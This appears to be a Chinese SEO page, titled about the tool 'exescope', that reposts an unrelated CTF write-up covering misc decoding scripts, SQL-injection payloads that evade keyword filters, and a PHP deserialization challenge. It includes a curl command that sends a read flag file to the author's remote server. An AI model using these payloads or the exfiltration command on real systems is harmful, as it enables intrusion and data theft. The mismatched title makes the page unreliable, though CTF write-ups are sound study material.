exescope(exescope是什么软件)

最近有很多读者朋友对exescope有疑问。由部分网友整理出相关内容希望能够解答你的疑惑,关于exescope是什么软件,本站也已经为你找到了问题的答案,希望能帮助到你。

exescope(exescope是什么软件)

作者:08067

预估稿费:300RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

比赛地址:ctf.08067.me

misc 100-1

http://misc.08067.me/misc4

misc 100-1 很简单,就是jsfuck和brianfuck两次编码,直接解出即可。

exescope(exescope是什么软件)

exescope(exescope是什么软件)

Misc 100-2

http://misc.08067.me/misc3/

Misc 100-2题目给的是一个图片,用winhex打开看到底部的密文

exescope(exescope是什么软件)

Base32解密得到:vbkq{ukCkS_vrduztucCVQXVuvzuckrvtZDUBTGYSkvcktv}

发现是凯撒加密,不过奇偶数移位方向不一样,发现偏移量是16,用脚本跑一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
str = "vbkq{ukCkS_vrduztucCVQXVuvzuckrvtZDUBTGYSkvcktv}"
for i in range(26):
key = ''
for x in str:
s = ord(x)
if (s not in range(97,123)) and (s not in range(65,91)):
key = key + chr(s)
else:
#print chr(s)
if s in range(97,123):
if s % 2 == 0:
s = s - i
if s not in range(97,123):
t = 97-s
t = 123-t
key = key + chr(t)
else:
key = key + chr(s)
else:
s = s + i
if s not in range(97,123):
t = s-122+96
key = key + chr(t)
else:
key = key + chr(s)
else:
#print chr(s)
if s % 2 == 0:
s = s - i
if s not in range(65,91):
t = 65-s
t = 91-t
key = key + chr(t)
else:
key = key + chr(s)
else:
s = s + i
if s not in range(65,91):
t = s-90+64
key = key + chr(t)
else:
key = key + chr(s)
print key

Misc 150

http://misc.08067.me/misc2/

打开wireshark数据包,提取http数据,得到一个flag.zip,

exescope(exescope是什么软件)

解压得到一个ce.txt文件,打开发现是一个rgb图片的像素点,然后用脚本还原即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from PIL import Image
import re
if __name__ == '__main__':
x = 887
y = 111
i = 0
j = 0
c = Image.new("RGB", (x,y))
file_object = open('ce.txt')
for i in range(0, x):
for j in range(0, y):
line = file_object.next()
lst = line.split(",")
c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))
c.show()
c.save("c.png")

web 200-1

http://web1.08067.me/

注入,过滤了空格、#、*、union、like、regexp、and、or、|、–、&、%0a、%0b、%0c、%0d等,需要想办法用其他操作符连接注入语句和闭合’。

mysql操作符参考:http://blog.csdn.net/yuzongtao/article/details/45044963

几个可用的poc:

1
uname='!=!!(ascii(mid((passwd)from(1)))=99)!=!!'1&passwd=dddd
1
uname=12'%(ascii(mid((passwd)from(1)))=99)%'1&passwd=dddd
1
uname=12'%(ascii(mid((passwd)from(1)))=99)^'1&passwd=dddd
1
uname=12'-(length(trim(leading%a0'c12'%a0from%a0passwd))<32)-'0&passwd=1

来到后台,可以执行命令,但是对反弹shell的一些关键字做了过滤,对空格也做了过滤,只能通过cat读取flag,没又回显,然后打到用远程vps的日志上面

exp:

curl$IFS\vps:1234/`cat$IFS\../../flag`

exescope(exescope是什么软件)

exescope(exescope是什么软件)

web 200-2

http://web3.08067.me/

这道题主要是考察了php底层 wakeup 的一个bug,https://bugs.php.net/bug.php?id=72663

这道题根据tips:编辑器,可以考虑到.bak文件泄露

通过 robots.txt 发现了 function.php commom.php ,

最后找到了 function.php.bak index.php.bak

我们就获得了 整道题的代码

Index.php.bak

exescope(exescope是什么软件)

我们可以看见了这里 通过 cookie 的登陆

/function.php.bak

exescope(exescope是什么软件)

其他过滤代码 在该文件都可以得到

addslashes_deep() 是无法绕过的,我们就只能绕过wakeup

根据那个bug 的描述,我们直接进入 __destruct() ,这里我们取出了 $this->name

$this->name 是base64decode后,然后反序列化得到的,不用考虑waf等东西

我们看了这里只有一个 Checksql($sql)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
//sql 过滤
static function CheckSql($db_string,$querytype='select')
{
$clean='';
$error='';
$old_pos=0;
$pos=-1;
if($querytype=='select')
{
$notallow1="[^0-9a-z@\._-]{1,}(load_file|outfile)[^0-9a-z@\.-]{1,}";
if(preg_match("/".$notallow1."/i", $db_string))
{
exit("Error");
}
}
//完整的SQL检查
while (TRUE)
{
$pos=strpos($db_string, '\'', $pos + 1);
if ($pos===FALSE)
{
break;
}
$clean .=substr($db_string, $old_pos, $pos - $old_pos);
while (TRUE)
{
$pos1=strpos($db_string, '\'', $pos + 1);
$pos2=strpos($db_string, '\\', $pos + 1);
if ($pos1===FALSE)
{
break;
}
elseif ($pos2==FALSE || $pos2 > $pos1)
{
$pos=$pos1;
break;
}
$pos=$pos2 + 1;
}
$clean .='$s

主题测试文章,只做测试使用。发布者:艾迪号,转转请注明出处:https://www.cqaedi.cn/baike/19542.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年 12月 13日 上午4:53
下一篇 2022年 12月 13日 上午6:05

相关推荐

  • 赵露思演的电视剧大全,播放赵露思主演的电视剧

    赵露思是一位备受瞩目的年轻演员,她在电视剧领域展现出了出色的演技和多样化的角色扮演能力。她参演的电视剧作品涵盖了各个题材和类型,从都市爱情到古装历史,从悬疑推理到家庭,无不展现出她的才华与魅力。这些作品不仅在国内取得了巨大的成功,也受到了国际观众的喜爱与认可。赵露思的精湛演技和出色表现让她成为了当今电视剧界备受关注的一颗新星。无论是她饰演的角色还是所参与的剧…

    百科大全 2023年 7月 15日
    00
  • 怎样求助社会人士筹款(怎样求助社会人士筹款的人)

    只有得到更多人的帮助,才能收获更多的筹款,对病人的治疗更有帮助,但想得到帮助并不容易,特别是在筹款之后,很多人知道筹款不那么容易,想筹集目标金额可以说更困难,所以如何呼吁别人捐款,帮助,已经成为一个非常重要的事情,下面告诉你如何呼吁别人捐款。 求助他人的请求可以写在很多地方,比如筹款文章的最后一段,转发朋友圈的转发语言,更新动态的求助语言等等。以下是一些呼吁…

    2023年 5月 7日
    00
  • 你的先生婚恋平台怎样(深圳你的先生婚恋平台怎样)

    最近,许多读者对你丈夫的婚姻平台有疑问。有网友整理了相关内容,希望能回答你的疑惑。关于你丈夫在深圳的婚恋平台,这个网站已经为你找到了问题的答案,希望对你有所帮助。 Comments作者: 这是一个超级热情的男人,工作认真,热爱生活。 是一个脾气温和、幽默风趣、爱好广泛的男孩。 下班后别忘了自娱自乐,平时喜欢看书听音乐。 可靠的年轻人,女生宁浪费也不纵容,快点…

    百科大全 2023年 2月 17日
    00
  • 一个木一个越怎么读(一个木一个越怎么读音)

    最近有很多读者朋友对如何阅读一个木一有疑问。有网友整理了相关内容,希望能回答你的疑惑。这个网站已经为你找到了问题的答案,希望对你有所帮助。 “咚、咚……“清晨雾气渐渐散去,鸡鸣犬吠未消。福建省三明市沙县区夏茂镇于邦村村民于和传站在一块厚厚的木板前,用手中厚厚的木锤砸碎了木板上的猪肉,用手锤打了下来,做成了扁肉馅。 小店开在余邦村“寻根追味”小吃街上,从站着“…

    百科大全 2023年 2月 6日
    00
  • 走穴是什么意思,女人的玉露是什么意思

    走穴是什么意思 走穴,指的是艺人在工作过程中到各地演出,而非在一个场馆内长期演出。对于一些刚入行的艺人来说,走穴是他们打开名气的重要途径。 一、走穴的定义 走穴是一种演出方式,将演出场地从一个固定的地点变成多个不同的地点。这样的表演方式不仅可以让观众更加广泛地了解艺人,也可以丰富艺人的演出经历和技能。 二、走穴的好处 走穴对于艺人来说,有着很多的好处。第一,…

    百科大全 2023年 6月 16日
    00

站长QQ

7401002

在线咨询: QQ交谈

邮件:7401002@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信